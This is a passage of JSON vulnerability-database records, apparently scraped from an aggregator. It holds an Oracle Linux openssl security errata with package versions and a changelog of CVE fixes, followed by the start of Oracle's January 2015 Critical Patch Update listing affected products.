"packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-1.0.1e-48.ksplice1.el6_8.3.i686.rpm", "arch": "i686", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-perl-1.0.1e-51.ksplice1.el7_2.7.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-static-1.0.1e-51.ksplice1.el7_2.7.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-perl-1.0.1e-48.ksplice1.el6_8.3.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-perl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-1.0.1e-48.ksplice1.el6_8.3.x86_64.rpm", "arch": "x86_64", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-1.0.1e-51.ksplice1.el7_2.7.src.rpm", "arch": "src", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-static-1.0.1e-48.ksplice1.el6_8.3.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-devel-1.0.1e-51.ksplice1.el7_2.7.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-libs-1.0.1e-51.ksplice1.el7_2.7.i686.rpm", "arch": "i686", "packageName": "openssl-libs", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-devel-1.0.1e-48.ksplice1.el6_8.3.x86_64.rpm", "arch": "x86_64", "packageName": "openssl-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-1.0.1e-48.ksplice1.el6_8.3.src.rpm", "arch": "src", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-1.0.1e-51.ksplice1.el7_2.7.x86_64.rpm", "arch": "x86_64", "packageName": "openssl", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "7", "packageVersion": "1.0.1e-51.ksplice1.el7_2.7", "packageFilename": "openssl-static-1.0.1e-51.ksplice1.el7_2.7.i686.rpm", "arch": "i686", "packageName": "openssl-static", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "6", "packageVersion": "1.0.1e-48.ksplice1.el6_8.3", "packageFilename": "openssl-devel-1.0.1e-48.ksplice1.el6_8.3.i686.rpm", "arch": "i686", "packageName": "openssl-devel", "operator": "lt"}], "description": "[1.0.1e-48.3]\n- fix CVE-2016-2177 - possible integer overflow\n- fix CVE-2016-2178 - non-constant time DSA operations\n- fix CVE-2016-2179 - further DoS issues in DTLS\n- fix CVE-2016-2180 - OOB read in TS_OBJ_print_bio()\n- fix CVE-2016-2181 - DTLS1 replay protection and unprocessed records issue\n- fix CVE-2016-2182 - possible buffer overflow in BN_bn2dec()\n- fix CVE-2016-6302 - insufficient TLS session ticket HMAC length check\n- fix CVE-2016-6304 - unbound memory growth with OCSP status request\n- fix CVE-2016-6306 - certificate message OOB reads\n- mitigate CVE-2016-2183 - degrade all 64bit block ciphers and RC4 to\n 112 bit effective strength\n- replace expired testing certificates\n[1.0.1e-48.1]\n- fix CVE-2016-2105 - possible overflow in base64 encoding\n- fix CVE-2016-2106 - possible overflow in EVP_EncryptUpdate()\n- fix CVE-2016-2107 - padding oracle in stitched AES-NI CBC-MAC\n- fix CVE-2016-2108 - memory corruption in ASN.1 encoder\n- fix CVE-2016-2109 - possible DoS when reading ASN.1 data from BIO\n- fix CVE-2016-0799 - memory issues in BIO_printf\n[1.0.1e-48]\n- fix CVE-2016-0702 - side channel attack on modular exponentiation\n- fix CVE-2016-0705 - double-free in DSA private key parsing\n- fix CVE-2016-0797 - heap corruption in BN_hex2bn and BN_dec2bn\n[1.0.1e-47]\n- fix CVE-2015-3197 - SSLv2 ciphersuite enforcement\n- disable SSLv2 in the generic TLS method\n[1.0.1e-46]\n- fix 1-byte memory leak in pkcs12 parse (#1229871)\n- document some options of the speed command (#1197095)\n[1.0.1e-45]\n- fix high-precision timestamps in timestamping authority\n[1.0.1e-44]\n- fix CVE-2015-7575 - disallow use of MD5 in TLS1.2\n[1.0.1e-43]\n- fix CVE-2015-3194 - certificate verify crash with missing PSS parameter\n- fix CVE-2015-3195 - X509_ATTRIBUTE memory leak\n- fix CVE-2015-3196 - race condition when handling PSK identity hint\n[1.0.1e-42]\n- fix regression caused by mistake in fix for CVE-2015-1791\n[1.0.1e-41]\n- improved fix for CVE-2015-1791\n- add missing parts of CVE-2015-0209 fix for corectness although unexploitable\n[1.0.1e-40]\n- fix CVE-2014-8176 - invalid free in DTLS buffering code\n- fix CVE-2015-1789 - out-of-bounds read in X509_cmp_time\n- fix CVE-2015-1790 - PKCS7 crash with missing EncryptedContent\n- fix CVE-2015-1791 - race condition handling NewSessionTicket\n- fix CVE-2015-1792 - CMS verify infinite loop with unknown hash function\n[1.0.1e-39]\n- fix CVE-2015-3216 - regression in RAND locking that can cause segfaults on\n read in multithreaded applications\n[1.0.1e-38]\n- fix CVE-2015-4000 - prevent the logjam attack on client - restrict\n the DH key size to at least 768 bits (limit will be increased in future)\n[1.0.1e-37]\n- drop the AES-GCM restriction of 2^32 operations because the IV is\n always 96 bits (32 bit fixed field + 64 bit invocation field)\n[1.0.1e-36]\n- update fix for CVE-2015-0287 to what was released upstream\n[1.0.1e-35]\n- fix CVE-2015-0209 - potential use after free in d2i_ECPrivateKey()\n- fix CVE-2015-0286 - improper handling of ASN.1 boolean comparison\n- fix CVE-2015-0287 - ASN.1 structure reuse decoding memory corruption\n- fix CVE-2015-0288 - X509_to_X509_REQ NULL pointer dereference\n- fix CVE-2015-0289 - NULL dereference decoding invalid PKCS#7 data\n- fix CVE-2015-0292 - integer underflow in base64 decoder\n- fix CVE-2015-0293 - triggerable assert in SSLv2 server\n[1.0.1e-34]\n- copy digest algorithm when handling SNI context switch\n- improve documentation of ciphersuites - patch by Hubert Kario\n- add support for setting Kerberos service and keytab in\n s_server and s_client\n[1.0.1e-33]\n- fix CVE-2014-3570 - incorrect computation in BN_sqr()\n- fix CVE-2014-3571 - possible crash in dtls1_get_record()\n- fix CVE-2014-3572 - possible downgrade of ECDH ciphersuite to non-PFS state\n- fix CVE-2014-8275 - various certificate fingerprint issues\n- fix CVE-2015-0204 - remove support for RSA ephemeral keys for non-export\n ciphersuites and on server\n- fix CVE-2015-0205 - do not allow unauthenticated client DH certificate\n- fix CVE-2015-0206 - possible memory leak when buffering DTLS records\n[1.0.1e-32]\n- use FIPS approved method for computation of d in RSA\n[1.0.1e-31]\n- fix CVE-2014-3567 - memory leak when handling session tickets\n- fix CVE-2014-3513 - memory leak in srtp support\n- add support for fallback SCSV to partially mitigate CVE-2014-3566\n (padding attack on SSL3)\n[1.0.1e-30]\n- add ECC TLS extensions to DTLS (#1119800)\n[1.0.1e-29]\n- fix CVE-2014-3505 - doublefree in DTLS packet processing\n- fix CVE-2014-3506 - avoid memory exhaustion in DTLS\n- fix CVE-2014-3507 - avoid memory leak in DTLS\n- fix CVE-2014-3508 - fix OID handling to avoid information leak\n- fix CVE-2014-3509 - fix race condition when parsing server hello\n- fix CVE-2014-3510 - fix DoS in anonymous (EC)DH handling in DTLS\n- fix CVE-2014-3511 - disallow protocol downgrade via fragmentation\n[1.0.1e-28]\n- fix CVE-2014-0224 fix that broke EAP-FAST session resumption support\n[1.0.1e-26]\n- drop EXPORT, RC2, and DES from the default cipher list (#1057520)\n- print ephemeral key size negotiated in TLS handshake (#1057715)\n- do not include ECC ciphersuites in SSLv2 client hello (#1090952)\n- properly detect encryption failure in BIO (#1100819)\n- fail on hmac integrity check if the .hmac file is empty (#1105567)\n- FIPS mode: make the limitations on DSA, DH, and RSA keygen\n length enforced only if OPENSSL_ENFORCE_MODULUS_BITS environment\n variable is set\n[1.0.1e-25]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-24]\n- add back support for secp521r1 EC curve\n[1.0.1e-23]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-22]\n- use 2048 bit RSA key in FIPS selftests\n[1.0.1e-21]\n- add DH_compute_key_padded needed for FIPS CAVS testing\n- make 3des strength to be 128 bits instead of 168 (#1056616)\n- FIPS mode: do not generate DSA keys and DH parameters < 2048 bits\n- FIPS mode: use approved RSA keygen (allows only 2048 and 3072 bit keys)\n- FIPS mode: add DH selftest\n- FIPS mode: reseed DRBG properly on RAND_add()\n- FIPS mode: add RSA encrypt/decrypt selftest\n- FIPS mode: add hard limit for 2^32 GCM block encryptions with the same key\n- use the key length from configuration file if req -newkey rsa is invoked\n[1.0.1e-20]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-19]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-18]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-17]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document", "edition": 1, "reporter": "Oracle", "published": "2016-09-27T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "oraclelinux", "title": "openssl security update", "bulletinFamily": "unix", "cvelist": ["CVE-2015-4000", "CVE-2013-0166", "CVE-2014-3505", "CVE-2012-2333", "CVE-2014-3508", "CVE-2015-1792", "CVE-2014-3566", "CVE-2015-3197", "CVE-2011-4108", "CVE-2014-3572", "CVE-2016-6306", "CVE-2016-0705", "CVE-2015-0206", "CVE-2015-1789", "CVE-2016-2183", "CVE-2013-0169", "CVE-2015-0286", "CVE-2013-6449", "CVE-2016-2178", "CVE-2014-3507", "CVE-2015-3195", "CVE-2016-2108", "CVE-2011-4576", "CVE-2014-3571", "CVE-2016-0799", "CVE-2016-6302", "CVE-2014-3513", "CVE-2016-2177", "CVE-2015-0288", "CVE-2012-1165", "CVE-2011-4577", "CVE-2014-0224", "CVE-2016-2105", "CVE-2015-3194", "CVE-2016-2107", "CVE-2011-4619", "CVE-2014-3511", "CVE-2011-0014", "CVE-2014-8275", "CVE-2016-2180", "CVE-2016-0797", "CVE-2016-0702", "CVE-2014-3570", "CVE-2015-7575", "CVE-2015-3196", "CVE-2014-3470", "CVE-2014-3506", "CVE-2016-2109", "CVE-2012-4929", "CVE-2016-2181", "CVE-2016-6304", "CVE-2013-6450", "CVE-2012-0050", "CVE-2015-0293", "CVE-2010-5298", "CVE-2014-0160", "CVE-2014-8176", "CVE-2013-4353", "CVE-2014-0195", "CVE-2014-0198", "CVE-2015-0209", "CVE-2014-3567", "CVE-2015-0204", "CVE-2012-2110", "CVE-2012-0884", "CVE-2015-1790", "CVE-2014-3510", "CVE-2016-2182", "CVE-2015-0287", "CVE-2011-3207", "CVE-2015-0289", "CVE-2015-3216", "CVE-2015-0292", "CVE-2015-0205", "CVE-2016-2179", "CVE-2016-2106", "CVE-2014-3509", "CVE-2015-1791", "CVE-2014-0221"], "modified": "2016-09-27T00:00:00", "id": "ELSA-2016-3621", "href": "http://linux.oracle.com/errata/ELSA-2016-3621.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oracle": [{"lastseen": "2018-04-18T20:23:51", "references": [], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\n \n\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n \n\n\n**Oracle has received specific reports of malicious exploitation of vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that malicious attackers have been successful because customers had failed to apply these Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\n \n\n\nThis Critical Patch Update contains 169 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\n \n\n\nPlease note that on October 16, 2014, Oracle released information for [CVE-2014-3566 \"POODLE\"](<http://www.oracle.com/technetwork/topics/security/poodlecve-2014-3566-2339408.html>). Customers of affected Oracle products are strongly advised to apply the fixes and/or configuration steps that were announced for CVE-2014-3566 in addition to the fixes announced in this CPU.\n\n \n\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available at: <http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>.\n\n \n\n", "edition": 1, "reporter": "Oracle", "published": "2015-03-10T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update - January 2015", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "affectedSoftware": [{"name": "Oracle HCM Configuration Workbench", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.1.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.4.2", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.2", "operator": "le"}, {"name": "Siebel Core EAI", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.4", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.2", "operator": "le"}, {"name": "Workspace Manager", "version": "12.1.0.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u72", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.3", "operator": "le"}, {"name": "Java SE", "version": "5.0u75", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.3", "operator": "le"}, {"name": "Workspace Manager", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "11.1.1.7.0", "operator": "le"}, {"name": "Oracle OpenSSO", "version": "8.0", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "5.1", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.20", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.6", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.2.4", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.4", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.1.0.7", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "27.8.4", "operator": "le"}, {"name": "Oracle Forms", "version": "11.1.2.2", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1118", "operator": "le"}, {"name": "Oracle Applications DBA", "version": "12.2.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "6u85", "operator": "le"}, {"name": "Java SE", "version": "8u25", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Enterprise Asset Management", "version": "8.1.1", "operator": "le"}, {"name": "Fujitsu M10-1, M10-4, M10-4S Servers", "version": "2240", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.1.7", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.3", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.1", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.6", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "7u71", "operator": "le"}, {"name": "Oracle Healthcare Master Person Index", "version": "1.x", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.1.5", "operator": "le"}, {"name": "Siebel Core - Server OM Services", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.2", "operator": "le"}, {"name": "Oracle HTTP Server", "version": "10.1.3.5.0", "operator": "le"}, {"name": "MICROS Retail", "version": "6.0.6", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "11.1.1.7", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.3.", "operator": "le"}, {"name": "Oracle Marketing", "version": "11.5.10.2", "operator": "le"}, {"name": "Java SE", "version": "6u85", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.4", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1", "operator": "le"}, {"name": "Oracle Real-Time Decision Server", "version": "3.0.x", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.2.3", "operator": "le"}, {"name": "Solaris", "version": "11", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Secure Global Desktop", "version": "4.63", "operator": "le"}, {"name": "Oracle WebCenter Content", "version": "11.1.1.8.0", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.1.34", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.2.2", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "11.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.28", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "11.5.10.2", "operator": "le"}, {"name": "Siebel Core - Server BizLogic Script", "version": "8.1.1", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "8u25", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.1", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.5", "operator": "le"}, {"name": "Workspace Manager", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.3.0", "operator": "le"}, {"name": "MICROS Retail", "version": "5.5.3", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.4", "operator": "le"}, {"name": "Siebel Core - Common Components", "version": "8.1.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.5", "operator": "le"}, {"name": "PeopleSoft Enterprise PeopleTools", "version": "8.54", "operator": "le"}, {"name": "BI Publisher (formerly XML Publisher)", "version": "10.1.3.4.2", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Business Intelligence Enterprise Edition", "version": "10.1.3.4.2", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.5", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.2.2", "operator": "le"}, {"name": "Oracle HCM Configuration Workbench", "version": "12.1.2", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.2.26", "operator": "le"}, {"name": "Siebel Public Sector", "version": "8.2.2", "operator": "le"}, {"name": "Recovery", "version": "12.1.0.1", "operator": "le"}, {"name": "MICROS Retail", "version": "3.5.0", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "28.3.4", "operator": "le"}, {"name": "XML Developer's Kit for C", "version": "12.1.0.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "4.x", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "11.1.1.7", "operator": "le"}, {"name": "PeopleSoft Enterprise HRMS", "version": "9.1", "operator": "le"}, {"name": "Oracle RDBMS", "version": "12.1.0.1", "operator": "le"}, {"name": "Solaris", "version": "10", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "3.2.26", "operator": "le"}, {"name": "Siebel Core - System Management", "version": "8.2.2", "operator": "le"}, {"name": "Oracle Containers for J2EE", "version": "10.1.3.5", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.0.6", "operator": "le"}, {"name": "Enterprise Manager Ops Center", "version": "12.1.4", "operator": "le"}, {"name": "MySQL Server", "version": "5.5.38", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.28", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.2", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "3", "operator": "le"}, {"name": "Oracle Applications Framework", "version": "12.2.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "11.5.10.2", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.4", "operator": "le"}, {"name": "Recovery", "version": "11.2.0.4", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.1.3", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.2", "operator": "le"}, {"name": "Oracle SOA Suite", "version": "12.1.3.0", "operator": "le"}, {"name": "Oracle Exalogic Infrastructure", "version": "4", "operator": "le"}, {"name": "OJVM", "version": "11.2.0.4", "operator": "le"}, {"name": "Enterprise Manager Base Platform", "version": "12.1.0.3", "operator": "le"}, {"name": "Java SE, Java SE Embedded, JRockit", "version": "5.0u75", "operator": "le"}, {"name": "Oracle Telecommunications Billing Integrator", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Web Applications Desktop Integrator", "version": "12.2.3", "operator": "le"}, {"name": "MICROS Retail", "version": "4.5.1", "operator": "le"}, {"name": "Oracle Agile PLM", "version": "9.3.3", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.2.2", "operator": "le"}, {"name": "Oracle Communications Diameter Signaling Router", "version": "5.0", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.1.0", "operator": "le"}, {"name": "Java SE", "version": "7u72", "operator": "le"}, {"name": "Oracle Transportation Management", "version": "6.3.3", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.0.26", "operator": "le"}, {"name": "Oracle Reports Developer", "version": "11.1.2.2", "operator": "le"}, {"name": "Siebel Core - Server Infrastructure", "version": "8.2.2", "operator": "le"}, {"name": "MICROS Retail", "version": "3.2.1", "operator": "le"}, {"name": "Oracle Communications Messaging Server", "version": "7.0.5.33.0", "operator": "le"}, {"name": "PL/SQL", "version": "11.2.0.3", "operator": "le"}, {"name": "Oracle iLearning", "version": "6.0", "operator": "le"}, {"name": "Oracle RDBMS", "version": "11.2.0.4", "operator": "le"}, {"name": "Siebel Life Sciences", "version": "8.1.1", "operator": "le"}, {"name": "SPARC Enterprise M3000, M4000, M5000, M8000, M9000 Servers", "version": "1119", "operator": "le"}, {"name": "Oracle Marketing", "version": "12.1.2", "operator": "le"}, {"name": "Siebel UI Framework", "version": "8.1.1", "operator": "le"}, {"name": "OJVM", "version": "12.1.0.1", "operator": "le"}, {"name": "Oracle VM VirtualBox", "version": "4.3.14", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.1.2", "operator": "le"}, {"name": "MICROS Retail", "version": "6.5.2", "operator": "le"}, {"name": "PL/SQL", "version": "11.1.0.7", "operator": "le"}, {"name": "Oracle WebLogic Server", "version": "12.1.2.0", "operator": "le"}, {"name": "Oracle Customer Interaction History", "version": "12.0.4", "operator": "le"}, {"name": "Oracle Adaptive Access Manager", "version": "11.1.2.1", "operator": "le"}, {"name": "Oracle Customer Intelligence", "version": "12.0.4", "operator": "le"}, {"name": 